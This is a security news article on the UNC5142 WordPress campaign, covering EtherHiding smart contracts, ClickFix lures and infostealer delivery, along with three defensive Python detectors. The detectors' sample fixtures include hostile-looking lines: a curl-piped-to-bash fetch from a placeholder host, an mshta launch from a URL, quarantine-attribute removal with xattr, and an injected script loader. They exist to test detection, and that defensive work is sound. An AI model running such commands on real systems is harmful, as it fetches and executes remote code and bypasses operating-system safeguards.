
WordPress Malware Campaign Uses Blockchain Smart Contracts to Spread Infostealers

A widespread WordPress malware campaign linked to a financially motivated group known as UNC5142 has been uncovered. The group has been abusing blockchain smart contracts to distribute information stealers including Atomic Stealer (AMOS), Lumma, Rhadamanthys (RADTHIEF), and Vidar. Security researchers from Google Threat Intelligence Group (GTIG) and Mandiant report that UNC5142 relies on a method called EtherHiding, which embeds malicious code inside blockchain transactions, making takedowns extremely difficult. This marks one of the most advanced uses of blockchain in active malware distribution campaigns and demonstrates how attackers are blending traditional compromises with Web3 technology to scale attacks across Windows and macOS systems.

How WordPress sites are compromised

UNC5142’s entry point is the exploitation of vulnerable WordPress installations. The group indiscriminately scans for outdated plugins, unpatched themes, and misconfigured sites. Once access is gained, attackers inject malicious JavaScript into plugin directories, theme files such as header.php and footer.php, or directly into the WordPress database. As of mid-2025, researchers identified over 14,000 pages carrying these injections, suggesting the campaigns reached a massive scale. These scripts serve as the first stage of infection and trigger communication with malicious smart contracts deployed on the BNB Smart Chain.
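The injection points named above (theme files such as header.php and footer.php, and post content stored in the database) are the first place a site owner should look. The following scanner is an added example written for this article, not code from the article, Google, or Mandiant; the allowlist of script hosts, the file names, and the sample theme and post content are constructed. It flags external scripts from hosts the site does not normally load from, inline scripts that both decode and execute or inject content, and anything appended after the closing </html> tag.

```python
"""Heuristic scan for injected <script> blocks in WordPress theme files and
post content. Added example, not code from the article or any vendor; the
allowlist, file names and sample content are constructed."""
import re
from dataclasses import dataclass

# Assumed allowlist: hosts this particular site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"example.com", "cdn.example.com"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
HOST_RE = re.compile(r"^(?:https?:)?//([^/:?#]+)", re.IGNORECASE)

# Traits of inline loaders: decode something, then execute or inject it.
INLINE_TRAITS = [
    ("base64-decode", re.compile(r"\batob\s*\(")),
    ("dynamic-eval", re.compile(r"\b(?:eval|Function)\s*\(")),
    ("charcode-build", re.compile(r"String\.fromCharCode")),
    ("dynamic-script-tag", re.compile(r"createElement\s*\(\s*['\"]script['\"]")),
]

@dataclass
class Finding:
    location: str
    reason: str
    snippet: str

def scan_html(location: str, html: str) -> list:
    """Return one Finding per suspicious <script> in a theme file or post body."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2)
        src = SRC_RE.search(attrs)
        if src:
            host_m = HOST_RE.match(src.group(1).strip())
            host = host_m.group(1).lower() if host_m else None
            # A relative src (no host) is same-origin and left alone here.
            if host and host not in ALLOWED_SCRIPT_HOSTS:
                findings.append(Finding(location, f"external script from unlisted host {host}", src.group(1)))
            continue
        traits = [name for name, rx in INLINE_TRAITS if rx.search(body)]
        # One trait alone is common in legitimate code; two or more together is not.
        if len(traits) >= 2:
            findings.append(Finding(location, "inline loader traits: " + ", ".join(traits), body.strip()[:80]))
    # Anything after the closing </html> tag is a classic append-injection spot.
    _head, sep, tail = html.lower().rpartition("</html>")
    if sep and "<script" in tail:
        findings.append(Finding(location, "script placed after </html>", tail.strip()[:80]))
    return findings

def scan_site(theme_files: dict, posts: dict) -> list:
    """Scan theme files (path -> content) and posts (post ID -> post_content)."""
    results = []
    for path, content in theme_files.items():
        results.extend(scan_html(path, content))
    for post_id, content in posts.items():
        results.extend(scan_html(f"wp_posts#{post_id}", content))
    return results

# Constructed samples: a clean header, a footer with an appended loader,
# one post pulling a script from an unlisted host, and one clean post.
SAMPLE_THEME = {
    "header.php": '<head><script src="https://cdn.example.com/app.js"></script></head>',
    "footer.php": ('</body></html>\n<script>var p=atob("Li4u");'
                   'var s=document.createElement("script");s.src=p;document.head.appendChild(s);</script>'),
}
SAMPLE_POSTS = {
    42: '<p>Welcome</p><script src="//static.example.invalid/l.js"></script>',
    43: "<p>Plain post</p>",
}

if __name__ == "__main__":
    for f in scan_site(SAMPLE_THEME, SAMPLE_POSTS):
        print(f"{f.location}: {f.reason} :: {f.snippet}")
```

Run it against a copy of wp-content/themes and a dump of wp_posts.post_content (and wp_options, where plugin-stored HTML lives); the allowlist should be built from a known-good backup of the same site rather than guessed.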

CLEARSHORT downloader and infection chain

The malicious JavaScript planted on WordPress sites is part of a downloader framework called CLEARSHORT. It evolved from a previous toolkit known as ClearFake, whose lures posed as Google Chrome update prompts. CLEARSHORT retrieves configuration data and payloads through smart contracts rather than hosting them directly on attacker domains. The first-stage script queries blockchain contracts to fetch instructions that direct the browser to attacker-controlled landing pages. These landing pages, often hosted on Cloudflare’s *.pages.dev infrastructure, serve lures that convince victims to execute commands on their local machines.


By separating the malicious logic into blockchain-based contracts, UNC5142 ensures persistence and agility. Even if a compromised WordPress site is cleaned or a domain is blocked, the blockchain-based components remain functional and immutable. This design allows the campaign to continue with minimal interruption and cheap updates.
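Because the contract data cannot be taken down, the realistic place to catch this stage is the network edge: a browser rendering an ordinary page should not be issuing JSON-RPC reads against a blockchain node. The following detector is an added example written for this article, not code from the article or any vendor, and it also covers the "monitor for blockchain interactions" advice later in the piece. The proxy log format, field names, referer allowlist and sample events are constructed; the JSON-RPC method names (eth_call, eth_getStorageAt, eth_getLogs) are the standard Ethereum-style read methods, which BNB Smart Chain nodes also expose.

```python
"""Flag browser-originated JSON-RPC contract reads triggered from pages on
ordinary (non-Web3) sites. Added example, not from the article or any vendor;
the log format, field names, allowlist and sample lines are constructed."""
import json
import re
from typing import Optional
from urllib.parse import urlsplit

# Ethereum-style JSON-RPC methods a page must call to read data out of a
# contract. BNB Smart Chain nodes expose the same API. Detection focus is assumed.
CONTRACT_READ_METHODS = {"eth_call", "eth_getStorageAt", "eth_getLogs"}

# Assumed allowlist: sites where in-browser Web3 calls are expected.
EXPECTED_WEB3_REFERERS = {"dapp.example.com"}

BROWSER_UA_RE = re.compile(r"Mozilla/5\.0", re.IGNORECASE)

def rpc_methods(body: str) -> set:
    """Extract JSON-RPC method names from a request body (single or batch)."""
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return set()
    items = doc if isinstance(doc, list) else [doc]
    return {i.get("method") for i in items if isinstance(i, dict) and i.get("method")}

def is_suspicious(event: dict) -> Optional[str]:
    """Return a reason when a proxy event looks like a contract read issued by a
    browser from a page on a site where Web3 traffic is not expected, else None."""
    if event.get("http_method") != "POST":
        return None
    reads = rpc_methods(event.get("body", "")) & CONTRACT_READ_METHODS
    if not reads:
        return None
    if not BROWSER_UA_RE.search(event.get("user_agent", "")):
        return None  # Wallet software and scripts calling nodes directly are out of scope.
    referer_host = urlsplit(event.get("referer", "")).hostname or ""
    if referer_host in EXPECTED_WEB3_REFERERS:
        return None
    return (f"browser on {referer_host or 'unknown referer'} read contract data via "
            f"{', '.join(sorted(reads))} against {event.get('dest_host')}")

def scan_proxy_log(lines: list) -> list:
    """Parse JSON-per-line proxy events; return (client_ip, reason) for each hit."""
    hits = []
    for line in lines:
        try:
            event = json.loads(line)
        except ValueError:
            continue  # Skip malformed lines rather than abort the whole scan.
        reason = is_suspicious(event)
        if reason:
            hits.append((event.get("client_ip", "?"), reason))
    return hits

# Constructed sample log: a page on a company blog reading a contract, a
# legitimate dapp doing the same, and an unrelated POST to an API.
SAMPLE_LOG = [
    json.dumps({"client_ip": "10.0.0.5", "http_method": "POST", "dest_host": "rpc.node.invalid",
                "referer": "https://blog.corp.example/news/",
                "user_agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/128",
                "body": json.dumps({"jsonrpc": "2.0", "id": 1, "method": "eth_call",
                                    "params": [{"to": "0x" + "ab" * 20, "data": "0x"}, "latest"]})}),
    json.dumps({"client_ip": "10.0.0.6", "http_method": "POST", "dest_host": "rpc.node.invalid",
                "referer": "https://dapp.example.com/swap",
                "user_agent": "Mozilla/5.0 (Macintosh) Safari/605",
                "body": json.dumps({"jsonrpc": "2.0", "id": 1, "method": "eth_call", "params": []})}),
    json.dumps({"client_ip": "10.0.0.7", "http_method": "POST", "dest_host": "api.example.com",
                "referer": "https://blog.corp.example/", "user_agent": "Mozilla/5.0",
                "body": json.dumps({"action": "comment"})}),
]

if __name__ == "__main__":
    for ip, reason in scan_proxy_log(SAMPLE_LOG):
        print(ip, reason)
```

The referer is the useful signal: the node being contacted may be a perfectly legitimate public RPC endpoint, so blocking by destination is noisy, whereas a corporate blog page driving contract reads is not something a normal site does.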

ClickFix and social engineering tactics

The landing pages presented to victims rely on ClickFix, a social engineering trick that pressures users into running malicious commands. Victims may see fake browser update prompts, Cloudflare “unusual traffic” errors, reCAPTCHA verification screens, or privacy agreement forms. Each lure contains carefully crafted instructions that ask the user to copy and paste a command into the Windows Run dialog or the macOS Terminal. By executing these commands locally, the victim bypasses browser protections and gives the attacker direct control to deploy malware.

On Windows systems, the command usually downloads an HTML Application (HTA) file from services like MediaFire. The HTA executes a PowerShell script designed to evade defenses and load encrypted payloads directly into memory. On macOS, victims are instructed to run a bash script that retrieves the Atomic Stealer via curl. This script also removes Apple’s quarantine attribute using xattr, ensuring the malware runs without triggering standard warning dialogs. This combination of deception and system-level execution makes the infection chain both effective and difficult to detect.
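The execution step described above leaves a recognisable trail in process-creation telemetry: mshta launched with a URL, PowerShell started hidden or with the execution policy bypassed, curl piped into a shell, and xattr stripping the quarantine attribute, all spawned from an interactive parent such as the Run dialog (explorer.exe) or a terminal shell. The scorer below is an added example written for this article, not code from the article or any vendor, and it also serves the "threat hunt aggressively" advice later in the piece. The event fields, rule weights, threshold, parent-process list and sample command lines (with placeholder .invalid URLs) are constructed.

```python
"""Score process-creation events for ClickFix-style execution: a command the
user pasted into the Run dialog or a terminal that fetches and runs remote
content. Added example, not from the article or any vendor; event fields,
weights, sample values and placeholder URLs are constructed."""
import re

# Each rule: (name, weight, regex over the command line). Weights are assumptions.
RULES = [
    ("mshta-with-url", 3,
     re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.I)),
    ("powershell-hidden-window", 2,
     re.compile(r"\bpowershell(?:\.exe)?\b.*\s-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("powershell-policy-bypass", 2,
     re.compile(r"\bpowershell(?:\.exe)?\b.*\s-(?:ep|executionpolicy)\s+bypass\b", re.I)),
    ("powershell-encoded-command", 2,
     re.compile(r"\bpowershell(?:\.exe)?\b.*\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("curl-piped-to-shell", 3,
     re.compile(r"\bcurl\b.*\|\s*(?:ba|z)?sh\b", re.I)),
    ("quarantine-removal", 3,
     re.compile(r"\bxattr\b.*\bcom\.apple\.quarantine\b", re.I)),
]

# Parents that indicate a human typed the command (Run dialog, terminal shell)
# or a freshly downloaded script is running, rather than a scheduled task or a
# deployment agent. Assumed for the example.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2", "login", "zsh", "bash", "sh"}

def score_event(event: dict) -> tuple:
    """Return (score, matched rule names) for one process-creation event."""
    cmd = event.get("command_line", "")
    score, matched = 0, []
    for name, weight, rx in RULES:
        if rx.search(cmd):
            score += weight
            matched.append(name)
    # Only weight the parent when some content rule already fired.
    if matched and event.get("parent_image", "").lower() in INTERACTIVE_PARENTS:
        score += 2
        matched.append("interactive-parent")
    return score, matched

def hunt(events: list, threshold: int = 4) -> list:
    """Return events scoring at or above the threshold, annotated with score and rules."""
    hits = []
    for ev in events:
        score, matched = score_event(ev)
        if score >= threshold:
            hits.append({**ev, "score": score, "rules": matched})
    return hits

# Constructed sample events: a Run-dialog mshta launch, a scheduled backup
# script (benign), a curl-to-bash one-liner, and a script removing quarantine.
SAMPLE_EVENTS = [
    {"host": "WIN-01", "parent_image": "explorer.exe",
     "command_line": "mshta https://files.example.invalid/verify.hta"},
    {"host": "WIN-02", "parent_image": "svchost.exe",
     "command_line": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"host": "MAC-01", "parent_image": "zsh",
     "command_line": 'bash -c "curl -fsSL https://cdn.example.invalid/x.sh | bash"'},
    {"host": "MAC-02", "parent_image": "bash",
     "command_line": "xattr -d com.apple.quarantine /Users/a/Downloads/update"},
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(h["host"], h["score"], h["rules"])
```

Feed it Sysmon event ID 1 or EDR process-start records on Windows and Endpoint Security or unified-log process events on macOS; the threshold keeps a lone xattr call by a developer below the line unless it arrives from an interactive parent, which is exactly the ClickFix shape.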

Evolution from ClearFake to CLEARSHORT

ClearFake, active since mid-2023, relied on fake Chrome update popups. Its main weakness was that payload URLs were hardcoded, making it easier for defenders to track and block. In late 2024, UNC5142 upgraded to CLEARSHORT, which leverages blockchain for dynamic delivery. Instead of embedding static links, CLEARSHORT uses smart contracts to supply landing page URLs, decryption keys, and payload information. This design removes the need for attackers to constantly modify compromised websites and makes detection significantly harder.

The introduction of a three-level smart contract system in late 2024 marked another leap in sophistication. Researchers describe this as a Router-Logic-Storage model: the first contract points to the next stage, the second handles reconnaissance and fingerprinting of victims, and the third stores payload URLs and encryption keys. Updates to any part of the chain only require a cheap blockchain transaction, costing attackers between $0.25 and $1.50. This allows for near real-time adaptation against takedowns and analysis efforts.

Main and secondary infrastructures

Investigators uncovered that UNC5142 operates two infrastructures simultaneously. The Main infrastructure was deployed in November 2024 and has been the backbone of campaigns, with frequent updates and consistent activity. In February 2025, the group launched a Secondary infrastructure, likely to expand capacity, test new payloads, or build resilience in case of disruption. Both infrastructures use nearly identical smart contract code and were funded from the same cryptocurrency wallets, making it clear they are controlled by the same operators. Transactions from both sets often occurred close together, highlighting coordinated campaign management.

Scale and impact of the campaign

By mid-2025, over 14,000 compromised WordPress pages had been linked to UNC5142’s malware distribution activities. This level of reach shows how the group indiscriminately targeted vulnerable websites across industries and geographies. The campaigns delivered a wide variety of malware families, but all were designed to steal data — from browser credentials and saved logins to cryptocurrency wallets and cloud application tokens. While no activity has been observed since July 2025, researchers caution this may only represent an operational pause as the group pivots to new methods.

Windows and macOS delivery methods

UNC5142 adapted its campaigns to both Windows and macOS. On Windows, HTA files downloaded via ClickFix lures launch PowerShell scripts that fetch encrypted payloads from MediaFire, GitHub, or attacker-controlled servers. These scripts decrypt and run malware directly in memory, leaving few forensic traces. Payloads are disguised as common file types such as MP4 videos or WAV audio files, further blending in with legitimate downloads.

On macOS, campaigns in February and April 2025 pushed Atomic Stealer. Early lures clearly labeled themselves as “macOS installation instructions,” while later ones reused the same templates as Windows campaigns. Victims were tricked into running bash commands that downloaded shell scripts, which then installed the stealer. This malware targeted Safari data, cryptocurrency wallets like MetaMask, and local keychain credentials. By disguising payloads and leveraging system commands, UNC5142 successfully bypassed standard macOS defenses.

Why blockchain malware is effective

The use of blockchain infrastructure provides UNC5142 with several strategic advantages:

  • Persistence: Smart contracts cannot be deleted once deployed. The malicious data remains on the blockchain permanently.
  • Agility: Attackers can cheaply update payload URLs and encryption keys without modifying compromised websites.
  • Obfuscation: Traffic to blockchain nodes resembles legitimate Web3 activity, making it harder for defenders to block.
  • Cost efficiency: Campaigns can be maintained and updated for under two dollars per change, keeping expenses low while scaling globally.

Lures and deception evolution

UNC5142 continually rotated its lures to avoid detection and maintain success rates. In early 2024, campaigns focused on fake Chrome updates. Later, the group adopted Cloudflare Pages to host lures, giving them an added layer of legitimacy. Victims encountered fake reCAPTCHA prompts, Cloudflare error messages, and anti-bot verification pages. Each lure was carefully designed to mimic trusted services while leading victims to execute malicious commands that bypassed browser protections.

Distribution of final payloads

UNC5142 campaigns delivered multiple families of infostealers. Vidar and Lumma targeted Windows environments, stealing browser credentials, cookies, and cryptocurrency wallets. Rhadamanthys (RADTHIEF) provided advanced credential theft capabilities, while Atomic Stealer was adapted for macOS. The diversity of payloads suggests UNC5142 operates as a distribution network, potentially renting out access or selling stolen data to other threat actors. This model is common in cybercrime, where distribution groups partner with operators of different malware families.

Community and research response

Security vendors including Google, Mandiant, and Sekoia have tracked UNC5142 extensively, documenting the group’s infrastructure and infection chains. Analysts note the group’s ability to innovate rapidly by integrating encryption, multi-contract systems, and trusted services like Cloudflare into its campaigns. While UNC5142 activity has not been observed since late July 2025, researchers caution this is likely a strategic shift. The group’s pattern of frequent updates and operational flexibility suggests it may re-emerge with new tactics designed to bypass existing defenses.

What organizations should do

  • Update WordPress sites: Patch core software, plugins, and themes. Remove unsupported components to reduce risk of compromise.
  • Enforce strong authentication: Use multi-factor authentication for WordPress admin accounts and restrict access where possible.
  • Monitor for blockchain interactions: Watch for suspicious Web3 connections initiated by browsers, which may indicate injected JavaScript code.
  • Educate users: Train staff to avoid executing commands from browser pop-ups, update prompts, or verification messages.
  • Block known infrastructure: Use blocklists for attacker-controlled MediaFire, GitHub repositories, and smart contract addresses tied to UNC5142.
  • Threat hunt aggressively: Look for PowerShell abuse, mshta activity, and evidence of in-memory malware execution. Monitor endpoints for infostealer behaviors.

Why this campaign matters

The UNC5142 operation illustrates how WordPress malware is evolving into advanced blockchain malware campaigns. By combining mass compromises of WordPress websites with decentralized blockchain infrastructure, attackers have created a delivery system that is cheap, scalable, and resilient against takedowns. The campaign highlights a dangerous new trend where cybercriminals repurpose legitimate Web3 technologies for malicious ends, blurring the line between normal blockchain traffic and malware operations. Organizations relying on WordPress or exposed web services must adapt quickly, hardening systems and monitoring for threats that now operate both on the surface web and decentralized blockchain platforms.

Sean Doyle

Sean is a tech author and security researcher with more than 20 years of experience in cybersecurity, privacy, malware analysis, analytics, and online marketing. He focuses on clear reporting, deep technical investigation, and practical guidance that helps readers stay safe in a fast-moving digital landscape. His work continues to appear in respected publications, including articles written for Private Internet Access. Through Botcrawl and his ongoing cybersecurity coverage, Sean provides trusted insights on data breaches, malware threats, and online safety for individuals and businesses worldwide.
